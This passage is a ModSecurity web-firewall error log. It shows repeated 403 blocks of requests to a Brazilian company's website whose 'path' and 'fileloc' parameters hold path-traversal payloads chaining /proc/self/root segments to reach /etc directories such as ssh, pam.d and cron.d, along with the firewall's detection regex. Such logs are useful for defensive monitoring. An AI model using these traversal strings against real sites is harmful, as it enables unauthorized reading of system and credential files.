"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDs_9ocpUE4ed4uDzfqQAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:52.415836 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:35756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDtLABkC4fWIHEf8HdmAAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:53.615268 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:35768] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDtbysWC90G-1nBrA3lAAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:54.892518 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.228.16:35074] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgDtpqj1wV0Si-OkefbbQAAABg"]
[Mon Mar 16 10:20:54.976333 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:35770] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDtrABkC4fWIHEf8HdmQAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:56.162247 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.241.46:35780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDuHjZBu2q05ozVU9HzAAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:57.446744 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:35796] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDubABkC4fWIHEf8HdmwAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:58.629765 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:35920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDurABkC4fWIHEf8HdnQAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:59.918543 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:35924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDu7ABkC4fWIHEf8HdngAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:21:01.006332 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:48226] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDvdSswJuvopo3lOhSkQAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:21:01.061708 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.241.46:35938] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDvQlT9VtDQc7bgUyeoQAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:21:03.542988 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.241.46:35946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDv3bQATo66fKoS7w_ogAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:21:06.323452 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:35960] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDwNSswJuvopo3lOhSkgAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:21:07.678248 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:35972] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDw46lpbStxTqkSktgUAAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:21:08.852605 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:51314] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDxNSswJuvopo3lOhSlAAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:21:11.419257 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.241.46:51326] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDx3bQATo66fKoS7w_pAAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:21:17.936811 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.241.46:51334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDzbysWC90G-1nBrA3ngAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:21:19.197661 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.241.46:57360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDzwlT9VtDQc7bgUyevwAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:21:21.816080 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.243.203:34536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD0QlT9VtDQc7bgUyexQAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:21:24.139533 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.243.203:36104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD1I6lpbStxTqkSktgVQAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:25.454205 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:36114] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD1Y6lpbStxTqkSktgVwAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:27.894838 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.243.203:36124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD1rysWC90G-1nBrA3oAAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:29.226635 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:36136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD2QlT9VtDQc7bgUyezAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
